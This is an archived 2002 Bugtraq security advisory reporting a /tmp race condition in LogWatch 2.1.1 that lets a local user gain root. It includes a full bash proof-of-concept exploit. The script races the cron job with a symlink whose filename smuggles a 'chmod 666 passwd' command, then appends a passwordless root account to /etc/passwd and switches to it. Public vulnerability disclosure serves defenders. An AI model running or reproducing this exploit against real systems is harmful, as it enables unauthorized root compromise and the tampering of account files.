8208133 2002-03-27 03:16 +0100  /110 rader/ Spybreak <spybreak@host.sk>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-27  19:53  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <21599>
Ärende: Root compromise through LogWatch 2.1.1
------------------------------------------------------------
From: "Spybreak" <spybreak@host.sk>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <20020327031626.M78748@host.sk>

Release  : March 27 2002
Author   : Spybreak <spybreak@host.sk>
Software : LogWatch
Version  : 2.1.1
Homepage : www.kaybee.org/~kirk/html/linux.html
Problems : A /tmp race condition leads to root
 



--- INTRO ---

LogWatch is a customizable log analysis system. LogWatch parses  
through your system's logs for a given period of time and creates a
report analyzing areas that you specify, in as much detail as you
require.

The collected results are reported to a chosen e-mail address,
root by default.

LogWatch 2.1.1 is a part of the Red Hat Linux 7.2 distribution,
enabled by default and daily run by the cron daemon.


--- PROBLEM ---

On a system running LogWatch, a local user is able to gain
unauthorized root access, due to a race condition during
the temporary directory creation.

--- EXPLOIT ---

cat > logwatch211.sh <<EOF

#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>


SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/

echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak <spybreak@host.sk>'
echo
echo "Waiting for LogWatch to be executed"
 
while :; do
  set `ps -o pid -C $SERVANT`
    if [ -n "$2" ]; then
      mkdir /tmp/logwatch.$2   
      ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
      break;
    fi
done
echo "Waiting for LogWatch to finish it's work"
while :; do
  set `ps -o pid -C $SERVANT`
    if [ -z "$2" ]; then
      ls -l /etc/passwd|mail root
      echo master::0:0:master:/root:/bin/bash >> /etc/passwd
      break;
    fi
done
su master  
  
EOF
      
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQGiBDyNCFYRBADSWAw4wBseXXi5O85Y/vXLauDyIZWCDg3oHTI8muKmMc4gUuPy
yYtrzF3eYKunDxxxyHNKgtFPwbQ/gRSZrtNb3HnWvWfE5BJlJ34+gsezlHztLrbu
HU07OGVj9LzAqXp9hv/zVhFombUjjJw3PtBb4nURsCyKNI2ELOaRlb5TtwCglbk6
Mb+83fkFWO7Netq6BM1qMIUD/1rrsDaMmsZe3ykiSo3yNnBmM4Dy2t4detn0BSF0
WzJ5AoX7Waa0e3I5aGiHxwE2v+fjGv5G1f+Ho0COt0YaPouWrt3kzEYa1TbtSNmK
9B/v00J/MYB311G1oMBJ1Qnaudc/6A2GsE9M05ubyfze/LccJk+/iuL/JPbHB6bz
tO8LA/0aZgOS8Vxu5Y6+kd0x61sAyvRvec8kriQcd2ntY8e1/ajJGGEoTGburn/8
pbyaQv3d01C9xQWkIQDHG9vveSaDe6g2wViPeRck5qENUoUZVAp92GarntYk5u5L
puW/iECkH5qfVyirc3x5F3iE5UhwSggPdJbVCVlXWF0S/jwdm7QbU3B5YnJlYWsg
PHNweWJyZWFrQGhvc3Quc2s+iFcEExECABcFAjyNCFYFCwcKAwQDFQMCAxYCAQIX
gAAKCRD618glLCYuNiIhAJ4v+NjW2sxebAqvatiwUy5T/PQV8gCfXAvm52qI62yD
rF1C5eqSJE38V3i5AQ0EPI0IWhAEANIdWxgsOG4aeTxnm22g2BKEF9kUBk6H16u8
SUjuO1tEsTOQrX7jwf+vMNTUlt1OEyX+FdPkhIbDxZPyfItGmsZItPsv5f5za4We
41QDnWZLPbLVR+DznDgBrPlbEJ402GD/kXGbIvN/G2bO+GV5onOOf0Xg0z62YEnv
ZmTMOTe/AAMFA/9bZqUpP5NHilu6vZfHybT7RqtnZoIVgVCnEChRPVN6DtcxS0Ux
YMTD/qnHlpa4Brwd2+jpOIfnx8NQT1Ijan66LN2u/qK5Y4O17gIgc9rn4js8XeVp
cPWq33Ux1ComMiWMuaJ5uIPPbGHgqGaR2HZ4tQt43AqzkuR6PWNR7lHAJYhGBBgR
AgAGBQI8jQhaAAoJEPrXyCUsJi42O7cAnjjZ0x6WOvGcX8nicpPCeUiyAIFmAJ49
JuaXm+j6UXFsTyeAkSYbGwHP5g==
=0feG
-----END PGP PUBLIC KEY BLOCK-----
(8208133) /Spybreak <spybreak@host.sk>/-------------